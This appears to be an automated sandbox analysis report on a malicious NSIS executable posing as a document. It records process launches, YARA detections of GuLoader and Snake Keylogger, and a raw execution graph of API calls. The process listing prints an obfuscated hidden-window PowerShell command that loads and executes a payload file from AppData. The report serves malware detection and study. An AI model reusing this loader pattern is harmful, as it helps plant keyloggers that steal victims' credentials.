                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-11-04 06:13:55 UTC  55                 IN         Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 01:13:01
Start date: 04/11/2024
Path: C:\Users\user\Desktop\DOC11042024.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\DOC11042024.exe"
Imagebase: 0x400000
File size: 677'344 bytes
MD5 hash: 2119B4C15A036B7E407A7483A89ECDBF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 01:13:02
Start date: 04/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Unproded=Get-Content -raw 'C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\Isbjergs.Krs';$Acockbill=$Unproded.SubString(73125,3);.$Acockbill($Unproded) "
Imagebase: 0x560000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2345390385.000000000A530000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 01:13:02
Start date: 04/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 01:13:31
Start date: 04/11/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x9b0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 23.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.6%
Total number of Nodes: 1303
Total number of Limit Nodes: 45
                                                                              execution_graph 3897 401d41 GetDC GetDeviceCaps 3898 402ab3 18 API calls 3897->3898 3899 401d5f MulDiv ReleaseDC 3898->3899 3900 402ab3 18 API calls 3899->3900 3901 401d7e 3900->3901 3902 405ec4 18 API calls 3901->3902 3903 401db7 CreateFontIndirectW 3902->3903 3904 4024e6 3903->3904 3905 401a42 3906 402ab3 18 API calls 3905->3906 3907 401a48 3906->3907 3908 402ab3 18 API calls 3907->3908 3909 4019f0 3908->3909 3917 404545 3918 404555 3917->3918 3919 40457b 3917->3919 3920 4040f1 19 API calls 3918->3920 3921 404158 8 API calls 3919->3921 3922 404562 SetDlgItemTextW 3920->3922 3923 404587 3921->3923 3922->3919 3924 401cc6 3925 402ab3 18 API calls 3924->3925 3926 401cd9 SetWindowLongW 3925->3926 3927 40295d 3926->3927 3196 401dc7 3204 402ab3 3196->3204 3198 401dcd 3199 402ab3 18 API calls 3198->3199 3200 401dd6 3199->3200 3201 401de8 EnableWindow 3200->3201 3202 401ddd ShowWindow 3200->3202 3203 40295d 3201->3203 3202->3203 3205 405ec4 18 API calls 3204->3205 3206 402ac7 3205->3206 3206->3198 3207 401bca 3208 402ab3 18 API calls 3207->3208 3209 401bd1 3208->3209 3210 402ab3 18 API calls 3209->3210 3211 401bdb 3210->3211 3212 401beb 3211->3212 3213 402ad0 18 API calls 3211->3213 3214 402ad0 18 API calls 3212->3214 3218 401bfb 3212->3218 3213->3212 3214->3218 3215 401c06 3219 402ab3 18 API calls 3215->3219 3216 401c4a 3217 402ad0 18 API calls 3216->3217 3220 401c4f 3217->3220 3218->3215 3218->3216 3221 401c0b 3219->3221 3222 402ad0 18 API calls 3220->3222 3223 402ab3 18 API calls 3221->3223 3224 401c58 FindWindowExW 3222->3224 3225 401c14 3223->3225 3228 401c7a 3224->3228 3226 401c3a SendMessageW 3225->3226 3227 401c1c SendMessageTimeoutW 3225->3227 3226->3228 3227->3228 3928 4050ca 3929 4050da 3928->3929 3930 4050ee 3928->3930 3932 4050e0 3929->3932 3940 405137 3929->3940 3931 4050f6 IsWindowVisible 3930->3931 3937 40510d 3930->3937 3933 405103 3931->3933 3931->3940 3935 40413d SendMessageW 
3932->3935 3941 404a20 SendMessageW 3933->3941 3934 40513c CallWindowProcW 3938 4050ea 3934->3938 3935->3938 3937->3934 3946 404aa0 3937->3946 3940->3934 3942 404a43 GetMessagePos ScreenToClient SendMessageW 3941->3942 3943 404a7f SendMessageW 3941->3943 3944 404a77 3942->3944 3945 404a7c 3942->3945 3943->3944 3944->3937 3945->3943 3955 405ea2 lstrcpynW 3946->3955 3948 404ab3 3956 405de9 wsprintfW 3948->3956 3950 404abd 3951 40140b 2 API calls 3950->3951 3952 404ac6 3951->3952 3957 405ea2 lstrcpynW 3952->3957 3954 404acd 3954->3940 3955->3948 3956->3950 3957->3954 3958 4024ca 3959 402ad0 18 API calls 3958->3959 3960 4024d1 3959->3960 3963 405b2b GetFileAttributesW CreateFileW 3960->3963 3962 4024dd 3963->3962 3248 4014cb 3249 405156 25 API calls 3248->3249 3250 4014d2 3249->3250 3964 40194b 3965 402ab3 18 API calls 3964->3965 3966 401952 3965->3966 3967 402ab3 18 API calls 3966->3967 3968 40195c 3967->3968 3969 402ad0 18 API calls 3968->3969 3970 401965 3969->3970 3971 401979 lstrlenW 3970->3971 3972 4019b5 3970->3972 3973 401983 3971->3973 3973->3972 3977 405ea2 lstrcpynW 3973->3977 3975 40199e 3975->3972 3976 4019ab lstrlenW 3975->3976 3976->3972 3977->3975 3978 40274b 3979 402ad0 18 API calls 3978->3979 3980 402759 3979->3980 3981 40276f 3980->3981 3983 402ad0 18 API calls 3980->3983 3982 405b06 2 API calls 3981->3982 3984 402775 3982->3984 3983->3981 4004 405b2b GetFileAttributesW CreateFileW 3984->4004 3986 402782 3987 40282b 3986->3987 3988 40278e GlobalAlloc 3986->3988 3991 402833 DeleteFileW 3987->3991 3992 402846 3987->3992 3989 402822 CloseHandle 3988->3989 3990 4027a7 3988->3990 3989->3987 4005 4032d1 SetFilePointer 3990->4005 3991->3992 3994 4027ad 3995 40329f ReadFile 3994->3995 3996 4027b6 GlobalAlloc 3995->3996 3997 4027c6 3996->3997 3998 4027fa WriteFile GlobalFree 3996->3998 4000 402ff8 48 API calls 3997->4000 3999 402ff8 48 API calls 3998->3999 4001 40281f 3999->4001 4003 4027d3 4000->4003 4001->3989 4002 4027f1 GlobalFree 4002->3998 4003->4002 
4004->3986 4005->3994 4006 40284c 4007 402ab3 18 API calls 4006->4007 4008 402852 4007->4008 4009 402875 4008->4009 4010 40288e 4008->4010 4019 402729 4008->4019 4011 40287a 4009->4011 4012 40288b 4009->4012 4013 4028a4 4010->4013 4014 402898 4010->4014 4020 405ea2 lstrcpynW 4011->4020 4021 405de9 wsprintfW 4012->4021 4015 405ec4 18 API calls 4013->4015 4016 402ab3 18 API calls 4014->4016 4015->4019 4016->4019 4020->4019 4021->4019 4022 40164d 4023 402ad0 18 API calls 4022->4023 4024 401653 4023->4024 4025 4061e5 2 API calls 4024->4025 4026 401659 4025->4026 4027 4019cf 4028 402ad0 18 API calls 4027->4028 4029 4019d6 4028->4029 4030 402ad0 18 API calls 4029->4030 4031 4019df 4030->4031 4032 4019e6 lstrcmpiW 4031->4032 4033 4019f8 lstrcmpW 4031->4033 4034 4019ec 4032->4034 4033->4034 3333 401e51 3334 402ad0 18 API calls 3333->3334 3335 401e57 3334->3335 3336 405156 25 API calls 3335->3336 3337 401e61 3336->3337 3351 405624 CreateProcessW 3337->3351 3340 401ec6 CloseHandle 3344 402729 3340->3344 3341 401e77 WaitForSingleObject 3342 401e89 3341->3342 3343 401e9b GetExitCodeProcess 3342->3343 3347 406245 2 API calls 3342->3347 3345 401eba 3343->3345 3346 401ead 3343->3346 3345->3340 3349 401eb8 3345->3349 3354 405de9 wsprintfW 3346->3354 3350 401e90 WaitForSingleObject 3347->3350 3349->3340 3350->3342 3352 405653 CloseHandle 3351->3352 3353 401e67 3351->3353 3352->3353 3353->3340 3353->3341 3353->3344 3354->3349 3355 402251 3356 402259 3355->3356 3358 40225f 3355->3358 3357 402ad0 18 API calls 3356->3357 3357->3358 3359 40226d 3358->3359 3360 402ad0 18 API calls 3358->3360 3361 40227b 3359->3361 3363 402ad0 18 API calls 3359->3363 3360->3359 3362 402ad0 18 API calls 3361->3362 3364 402284 WritePrivateProfileStringW 3362->3364 3363->3361 4035 4028d1 4036 402ab3 18 API calls 4035->4036 4037 4028d7 4036->4037 4038 4028e5 4037->4038 4039 40290a 4037->4039 4041 402729 4037->4041 4038->4041 4043 405de9 wsprintfW 4038->4043 4040 405ec4 18 API calls 4039->4040 4039->4041 
4040->4041 4043->4041 3365 402452 3376 402bda 3365->3376 3367 40245c 3368 402ab3 18 API calls 3367->3368 3369 402465 3368->3369 3370 402470 3369->3370 3373 402729 3369->3373 3371 402489 RegEnumValueW 3370->3371 3372 40247d RegEnumKeyW 3370->3372 3371->3373 3374 4024a2 RegCloseKey 3371->3374 3372->3374 3374->3373 3377 402ad0 18 API calls 3376->3377 3378 402bf3 3377->3378 3379 402c01 RegOpenKeyExW 3378->3379 3379->3367 3380 401752 3381 402ad0 18 API calls 3380->3381 3382 401759 3381->3382 3383 401781 3382->3383 3384 401779 3382->3384 3420 405ea2 lstrcpynW 3383->3420 3419 405ea2 lstrcpynW 3384->3419 3387 40177f 3391 406136 5 API calls 3387->3391 3388 40178c 3389 40590a 3 API calls 3388->3389 3390 401792 lstrcatW 3389->3390 3390->3387 3393 40179e 3391->3393 3392 4061e5 2 API calls 3392->3393 3393->3392 3394 405b06 2 API calls 3393->3394 3396 4017b0 CompareFileTime 3393->3396 3397 401870 3393->3397 3398 401847 3393->3398 3400 405ea2 lstrcpynW 3393->3400 3406 405ec4 18 API calls 3393->3406 3418 405b2b GetFileAttributesW CreateFileW 3393->3418 3421 405685 3393->3421 3394->3393 3396->3393 3399 405156 25 API calls 3397->3399 3402 405156 25 API calls 3398->3402 3408 40185c 3398->3408 3401 40187a 3399->3401 3400->3393 3403 402ff8 48 API calls 3401->3403 3402->3408 3404 40188d 3403->3404 3405 4018a1 SetFileTime 3404->3405 3407 4018b3 CloseHandle 3404->3407 3405->3407 3406->3393 3407->3408 3409 4018c4 3407->3409 3410 4018c9 3409->3410 3411 4018dc 3409->3411 3413 405ec4 18 API calls 3410->3413 3412 405ec4 18 API calls 3411->3412 3414 4018e4 3412->3414 3416 4018d1 lstrcatW 3413->3416 3417 405685 MessageBoxIndirectW 3414->3417 3416->3414 3417->3408 3418->3393 3419->3387 3420->3388 3422 40569a 3421->3422 3423 4056e6 3422->3423 3424 4056ae MessageBoxIndirectW 3422->3424 3423->3393 3424->3423 4044 404ad2 GetDlgItem GetDlgItem 4045 404b24 7 API calls 4044->4045 4057 404d3d 4044->4057 4046 404bc7 DeleteObject 4045->4046 4047 404bba SendMessageW 4045->4047 4048 404bd0 4046->4048 
4047->4046 4050 404c07 4048->4050 4051 405ec4 18 API calls 4048->4051 4049 404e21 4053 404ecd 4049->4053 4059 404d30 4049->4059 4064 404e7a SendMessageW 4049->4064 4052 4040f1 19 API calls 4050->4052 4054 404be9 SendMessageW SendMessageW 4051->4054 4058 404c1b 4052->4058 4055 404ed7 SendMessageW 4053->4055 4056 404edf 4053->4056 4054->4048 4055->4056 4066 404ef1 ImageList_Destroy 4056->4066 4067 404ef8 4056->4067 4075 404f08 4056->4075 4057->4049 4062 404a20 5 API calls 4057->4062 4078 404dae 4057->4078 4063 4040f1 19 API calls 4058->4063 4060 404158 8 API calls 4059->4060 4065 4050c3 4060->4065 4061 404e13 SendMessageW 4061->4049 4062->4078 4079 404c29 4063->4079 4064->4059 4069 404e8f SendMessageW 4064->4069 4066->4067 4070 404f01 GlobalFree 4067->4070 4067->4075 4068 405077 4068->4059 4073 405089 ShowWindow GetDlgItem ShowWindow 4068->4073 4072 404ea2 4069->4072 4070->4075 4071 404cfe GetWindowLongW SetWindowLongW 4074 404d17 4071->4074 4080 404eb3 SendMessageW 4072->4080 4073->4059 4076 404d35 4074->4076 4077 404d1d ShowWindow 4074->4077 4075->4068 4085 404aa0 4 API calls 4075->4085 4091 404f43 4075->4091 4096 404126 SendMessageW 4076->4096 4095 404126 SendMessageW 4077->4095 4078->4049 4078->4061 4079->4071 4081 404cf8 4079->4081 4084 404c79 SendMessageW 4079->4084 4086 404cb5 SendMessageW 4079->4086 4087 404cc6 SendMessageW 4079->4087 4080->4053 4081->4071 4081->4074 4084->4079 4085->4091 4086->4079 4087->4079 4088 40504d InvalidateRect 4088->4068 4089 405063 4088->4089 4097 40493a 4089->4097 4090 404f71 SendMessageW 4092 404f87 4090->4092 4091->4090 4091->4092 4092->4088 4094 404ffb SendMessageW SendMessageW 4092->4094 4094->4092 4095->4059 4096->4057 4098 404957 4097->4098 4099 405ec4 18 API calls 4098->4099 4100 40498c 4099->4100 4101 405ec4 18 API calls 4100->4101 4102 404997 4101->4102 4103 405ec4 18 API calls 4102->4103 4104 4049c8 lstrlenW wsprintfW SetDlgItemTextW 4103->4104 4104->4068 3425 4022d3 3426 402303 3425->3426 3427 4022d8 3425->3427 3429 
402ad0 18 API calls 3426->3429 3428 402bda 19 API calls 3427->3428 3430 4022df 3428->3430 3431 40230a 3429->3431 3432 4022e9 3430->3432 3437 402322 3430->3437 3438 402b10 RegOpenKeyExW 3431->3438 3433 402ad0 18 API calls 3432->3433 3435 4022f0 RegDeleteValueW RegCloseKey 3433->3435 3435->3437 3445 402b3b 3438->3445 3447 402320 3438->3447 3439 402b61 RegEnumKeyW 3440 402b73 RegCloseKey 3439->3440 3439->3445 3442 40620c 3 API calls 3440->3442 3441 402b98 RegCloseKey 3441->3447 3444 402b83 3442->3444 3443 402b10 3 API calls 3443->3445 3446 402bb3 RegDeleteKeyW 3444->3446 3444->3447 3445->3439 3445->3440 3445->3441 3445->3443 3446->3447 3447->3437 4105 4048d4 4106 404900 4105->4106 4107 4048e4 4105->4107 4109 404933 4106->4109 4110 404906 SHGetPathFromIDListW 4106->4110 4116 405669 GetDlgItemTextW 4107->4116 4112 404916 4110->4112 4115 40491d SendMessageW 4110->4115 4111 4048f1 SendMessageW 4111->4106 4113 40140b 2 API calls 4112->4113 4113->4115 4115->4109 4116->4111 4117 401ed4 4118 402ad0 18 API calls 4117->4118 4119 401edb 4118->4119 4120 4061e5 2 API calls 4119->4120 4121 401ee1 4120->4121 4123 401ef2 4121->4123 4124 405de9 wsprintfW 4121->4124 4124->4123 4125 4014d7 4126 402ab3 18 API calls 4125->4126 4127 4014dd Sleep 4126->4127 4129 40295d 4127->4129 4130 40155b 4131 402903 4130->4131 4134 405de9 wsprintfW 4131->4134 4133 402908 4134->4133 4142 4026dc 4143 4026db 4142->4143 4143->4142 4144 4026ec FindNextFileW 4143->4144 4145 4026f7 4143->4145 4144->4145 4146 40273e 4144->4146 4148 405ea2 lstrcpynW 4146->4148 4148->4145 3871 40165e 3872 402ad0 18 API calls 3871->3872 3873 401665 3872->3873 3874 402ad0 18 API calls 3873->3874 3875 40166e 3874->3875 3876 402ad0 18 API calls 3875->3876 3877 401677 MoveFileW 3876->3877 3878 401683 3877->3878 3879 40168a 3877->3879 3881 401423 25 API calls 3878->3881 3880 4061e5 2 API calls 3879->3880 3883 402195 3879->3883 3882 401699 3880->3882 3881->3883 3882->3883 3884 405d3c 40 API calls 3882->3884 3884->3878 3885 4023de 3886 
402bda 19 API calls 3885->3886 3887 4023e8 3886->3887 3888 402ad0 18 API calls 3887->3888 3889 4023f1 3888->3889 3890 4023fc RegQueryValueExW 3889->3890 3893 402729 3889->3893 3891 402422 RegCloseKey 3890->3891 3892 40241c 3890->3892 3891->3893 3892->3891 3896 405de9 wsprintfW 3892->3896 3896->3891 4149 401ce5 GetDlgItem GetClientRect 4150 402ad0 18 API calls 4149->4150 4151 401d17 LoadImageW SendMessageW 4150->4151 4152 401d35 DeleteObject 4151->4152 4153 40295d 4151->4153 4152->4153 3229 40206a 3230 402ad0 18 API calls 3229->3230 3231 402071 3230->3231 3232 402ad0 18 API calls 3231->3232 3233 40207b 3232->3233 3234 402ad0 18 API calls 3233->3234 3235 402084 3234->3235 3236 402ad0 18 API calls 3235->3236 3237 40208e 3236->3237 3238 402ad0 18 API calls 3237->3238 3239 402098 3238->3239 3240 4020ac CoCreateInstance 3239->3240 3241 402ad0 18 API calls 3239->3241 3242 4020cb 3240->3242 3241->3240 3244 402195 3242->3244 3245 401423 3242->3245 3246 405156 25 API calls 3245->3246 3247 401431 3246->3247 3247->3244 3251 40156b 3252 401584 3251->3252 3253 40157b ShowWindow 3251->3253 3254 401592 ShowWindow 3252->3254 3255 40295d 3252->3255 3253->3252 3254->3255 4161 4024ec 4162 4024f1 4161->4162 4163 40250a 4161->4163 4164 402ab3 18 API calls 4162->4164 4165 402510 4163->4165 4166 40253c 4163->4166 4172 4024f8 4164->4172 4167 402ad0 18 API calls 4165->4167 4168 402ad0 18 API calls 4166->4168 4169 402517 WideCharToMultiByte lstrlenA 4167->4169 4170 402543 lstrlenW 4168->4170 4169->4172 4170->4172 4171 402729 4172->4171 4173 402565 WriteFile 4172->4173 4173->4171 4174 4018ef 4175 401926 4174->4175 4176 402ad0 18 API calls 4175->4176 4177 40192b 4176->4177 4178 405731 71 API calls 4177->4178 4179 401934 4178->4179 4180 402571 4181 402ab3 18 API calls 4180->4181 4186 40257a 4181->4186 4182 402642 4183 4025c1 ReadFile 4183->4182 4183->4186 4184 4025fe ReadFile 4184->4182 4184->4186 4185 4025de MultiByteToWideChar 4185->4186 4186->4182 4186->4183 4186->4184 4186->4185 4187 402644 
4186->4187 4188 402655 4186->4188 4191 405de9 wsprintfW 4187->4191 4188->4182 4190 402671 SetFilePointer 4188->4190 4190->4182 4191->4182 4192 4014f1 SetForegroundWindow 4193 40295d 4192->4193 4194 4018f2 4195 402ad0 18 API calls 4194->4195 4196 4018f9 4195->4196 4197 405685 MessageBoxIndirectW 4196->4197 4198 401902 4197->4198 3448 401df3 3449 402ad0 18 API calls 3448->3449 3450 401df9 3449->3450 3451 402ad0 18 API calls 3450->3451 3452 401e02 3451->3452 3453 402ad0 18 API calls 3452->3453 3454 401e0b 3453->3454 3455 402ad0 18 API calls 3454->3455 3456 401e14 3455->3456 3457 401423 25 API calls 3456->3457 3458 401e1b ShellExecuteW 3457->3458 3459 401e4c 3458->3459 4204 4064f7 4205 40637b 4204->4205 4206 406ce6 4205->4206 4207 406405 GlobalAlloc 4205->4207 4208 4063fc GlobalFree 4205->4208 4209 406473 GlobalFree 4205->4209 4210 40647c GlobalAlloc 4205->4210 4207->4205 4207->4206 4208->4207 4209->4210 4210->4205 4210->4206 4211 4014ff 4212 401507 4211->4212 4214 40151a 4211->4214 4213 402ab3 18 API calls 4212->4213 4213->4214 4215 401000 4216 401037 BeginPaint GetClientRect 4215->4216 4217 40100c DefWindowProcW 4215->4217 4219 4010f3 4216->4219 4220 401179 4217->4220 4221 401073 CreateBrushIndirect FillRect DeleteObject 4219->4221 4222 4010fc 4219->4222 4221->4219 4223 401102 CreateFontIndirectW 4222->4223 4224 401167 EndPaint 4222->4224 4223->4224 4225 401112 6 API calls 4223->4225 4224->4220 4225->4224 4226 401a00 4227 402ad0 18 API calls 4226->4227 4228 401a09 ExpandEnvironmentStringsW 4227->4228 4229 401a1d 4228->4229 4231 401a30 4228->4231 4230 401a22 lstrcmpW 4229->4230 4229->4231 4230->4231 4239 401b01 4240 402ad0 18 API calls 4239->4240 4241 401b08 4240->4241 4242 402ab3 18 API calls 4241->4242 4243 401b11 wsprintfW 4242->4243 4244 40295d 4243->4244 4245 404205 lstrcpynW lstrlenW 3186 402706 3187 402ad0 18 API calls 3186->3187 3188 40270d FindFirstFileW 3187->3188 3189 402735 3188->3189 3192 402720 3188->3192 3194 405de9 wsprintfW 3189->3194 3191 40273e 3195 
405ea2 lstrcpynW 3191->3195 3194->3191 3195->3192 4246 401f08 4247 402ad0 18 API calls 4246->4247 4248 401f0f GetFileVersionInfoSizeW 4247->4248 4249 401f36 GlobalAlloc 4248->4249 4250 401f8c 4248->4250 4249->4250 4251 401f4a GetFileVersionInfoW 4249->4251 4251->4250 4252 401f59 VerQueryValueW 4251->4252 4252->4250 4253 401f72 4252->4253 4257 405de9 wsprintfW 4253->4257 4255 401f7e 4258 405de9 wsprintfW 4255->4258 4257->4255 4258->4250 4259 40458c 4260 4045b8 4259->4260 4261 4045c9 4259->4261 4320 405669 GetDlgItemTextW 4260->4320 4263 4045d5 GetDlgItem 4261->4263 4295 404634 4261->4295 4265 4045e9 4263->4265 4264 4045c3 4267 406136 5 API calls 4264->4267 4268 4045fd SetWindowTextW 4265->4268 4272 4059b5 4 API calls 4265->4272 4266 404718 4269 4048b9 4266->4269 4322 405669 GetDlgItemTextW 4266->4322 4267->4261 4273 4040f1 19 API calls 4268->4273 4271 404158 8 API calls 4269->4271 4276 4048cd 4271->4276 4277 4045f3 4272->4277 4278 404619 4273->4278 4274 405ec4 18 API calls 4279 4046a8 SHBrowseForFolderW 4274->4279 4275 404748 4280 405a12 18 API calls 4275->4280 4277->4268 4286 40590a 3 API calls 4277->4286 4281 4040f1 19 API calls 4278->4281 4279->4266 4282 4046c0 CoTaskMemFree 4279->4282 4283 40474e 4280->4283 4284 404627 4281->4284 4285 40590a 3 API calls 4282->4285 4323 405ea2 lstrcpynW 4283->4323 4321 404126 SendMessageW 4284->4321 4288 4046cd 4285->4288 4286->4268 4291 404704 SetDlgItemTextW 4288->4291 4296 405ec4 18 API calls 4288->4296 4290 40462d 4293 40620c 3 API calls 4290->4293 4291->4266 4292 404765 4294 40620c 3 API calls 4292->4294 4293->4295 4303 40476d 4294->4303 4295->4266 4295->4269 4295->4274 4297 4046ec lstrcmpiW 4296->4297 4297->4291 4300 4046fd lstrcatW 4297->4300 4298 4047ac 4324 405ea2 lstrcpynW 4298->4324 4300->4291 4301 4047b3 4302 4059b5 4 API calls 4301->4302 4304 4047b9 GetDiskFreeSpaceW 4302->4304 4303->4298 4307 405956 2 API calls 4303->4307 4309 4047fe 4303->4309 4306 4047dc MulDiv 4304->4306 4304->4309 4306->4309 4307->4303 4308 
404868 4311 40488b 4308->4311 4313 40140b 2 API calls 4308->4313 4309->4308 4310 40493a 21 API calls 4309->4310 4312 40485a 4310->4312 4325 404113 KiUserCallbackDispatcher 4311->4325 4314 40486a SetDlgItemTextW 4312->4314 4315 40485f 4312->4315 4313->4311 4314->4308 4318 40493a 21 API calls 4315->4318 4317 4048a7 4317->4269 4326 404521 4317->4326 4318->4308 4320->4264 4321->4290 4322->4275 4323->4292 4324->4301 4325->4317 4327 404534 SendMessageW 4326->4327 4328 40452f 4326->4328 4327->4269 4328->4327 4329 40428e 4330 4042a6 4329->4330 4336 4043c0 4329->4336 4337 4040f1 19 API calls 4330->4337 4331 40442a 4332 404434 GetDlgItem 4331->4332 4333 4044fc 4331->4333 4334 4044bd 4332->4334 4335 40444e 4332->4335 4338 404158 8 API calls 4333->4338 4334->4333 4343 4044cf 4334->4343 4335->4334 4342 404474 6 API calls 4335->4342 4336->4331 4336->4333 4339 4043fb GetDlgItem SendMessageW 4336->4339 4340 40430d 4337->4340 4350 4044f7 4338->4350 4360 404113 KiUserCallbackDispatcher 4339->4360 4341 4040f1 19 API calls 4340->4341 4345 40431a CheckDlgButton 4341->4345 4342->4334 4346 4044e5 4343->4346 4347 4044d5 SendMessageW 4343->4347 4358 404113 KiUserCallbackDispatcher 4345->4358 4346->4350 4351 4044eb SendMessageW 4346->4351 4347->4346 4348 404425 4352 404521 SendMessageW 4348->4352 4351->4350 4352->4331 4353 404338 GetDlgItem 4359 404126 SendMessageW 4353->4359 4355 40434e SendMessageW 4356 404374 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4355->4356 4357 40436b GetSysColor 4355->4357 4356->4350 4357->4356 4358->4353 4359->4355 4360->4348 4361 401c8e 4362 402ab3 18 API calls 4361->4362 4363 401c94 IsWindow 4362->4363 4364 4019f0 4363->4364 4365 40268f 4366 402696 4365->4366 4368 402908 4365->4368 4367 402ab3 18 API calls 4366->4367 4369 4026a1 4367->4369 4370 4026a8 SetFilePointer 4369->4370 4370->4368 4371 4026b8 4370->4371 4373 405de9 wsprintfW 4371->4373 4373->4368 4374 401491 4375 405156 25 API calls 4374->4375 4376 401498 4375->4376 4377 402293 4378 
402ad0 18 API calls 4377->4378 4379 4022a2 4378->4379 4380 402ad0 18 API calls 4379->4380 4381 4022ab 4380->4381 4382 402ad0 18 API calls 4381->4382 4383 4022b5 GetPrivateProfileStringW 4382->4383 3460 405295 3461 405441 3460->3461 3462 4052b6 GetDlgItem GetDlgItem GetDlgItem 3460->3462 3464 40544a GetDlgItem CreateThread CloseHandle 3461->3464 3466 405472 3461->3466 3506 404126 SendMessageW 3462->3506 3464->3466 3529 405229 OleInitialize 3464->3529 3465 405327 3472 40532e GetClientRect GetSystemMetrics SendMessageW SendMessageW 3465->3472 3467 40549d 3466->3467 3468 405489 ShowWindow ShowWindow 3466->3468 3469 4054bf 3466->3469 3470 4054fb 3467->3470 3474 4054d4 ShowWindow 3467->3474 3475 4054ae 3467->3475 3511 404126 SendMessageW 3468->3511 3515 404158 3469->3515 3470->3469 3481 405506 SendMessageW 3470->3481 3479 405381 SendMessageW SendMessageW 3472->3479 3480 40539d 3472->3480 3477 4054f4 3474->3477 3478 4054e6 3474->3478 3512 4040ca 3475->3512 3476 4054cd 3484 4040ca SendMessageW 3477->3484 3483 405156 25 API calls 3478->3483 3479->3480 3485 4053b0 3480->3485 3486 4053a2 SendMessageW 3480->3486 3481->3476 3487 40551f CreatePopupMenu 3481->3487 3483->3477 3484->3470 3507 4040f1 3485->3507 3486->3485 3488 405ec4 18 API calls 3487->3488 3490 40552f AppendMenuW 3488->3490 3492 405542 GetWindowRect 3490->3492 3493 405555 3490->3493 3491 4053c0 3494 4053c9 ShowWindow 3491->3494 3495 4053fd GetDlgItem SendMessageW 3491->3495 3496 40555e TrackPopupMenu 3492->3496 3493->3496 3497 4053ec 3494->3497 3498 4053df ShowWindow 3494->3498 3495->3476 3499 405424 SendMessageW SendMessageW 3495->3499 3496->3476 3500 40557c 3496->3500 3510 404126 SendMessageW 3497->3510 3498->3497 3499->3476 3501 405598 SendMessageW 3500->3501 3501->3501 3503 4055b5 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3501->3503 3504 4055da SendMessageW 3503->3504 3504->3504 3505 405603 GlobalUnlock SetClipboardData CloseClipboard 3504->3505 3505->3476 3506->3465 3508 405ec4 18 API calls 

                                                                              Control-flow Graph (function 0040331C)
                                                                              APIs
                                                                              • #17.COMCTL32 ref: 0040333B
                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403346
                                                                              • OleInitialize.OLE32(00000000), ref: 0040334D
                                                                                • Part of subcall function 0040620C: GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
                                                                                • Part of subcall function 0040620C: LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
                                                                                • Part of subcall function 0040620C: GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
                                                                              • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 00403375
                                                                                • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
                                                                              • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 0040338A
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DOC11042024.exe",00000000), ref: 0040339D
                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DOC11042024.exe",00000020), ref: 004033C4
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004034CD
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034DE
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034EA
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034FE
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403506
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403517
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403533
                                                                              • OleUninitialize.OLE32(?), ref: 004035E3
                                                                              • ExitProcess.KERNEL32 ref: 00403603
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DOC11042024.exe",00000000,?), ref: 0040360F
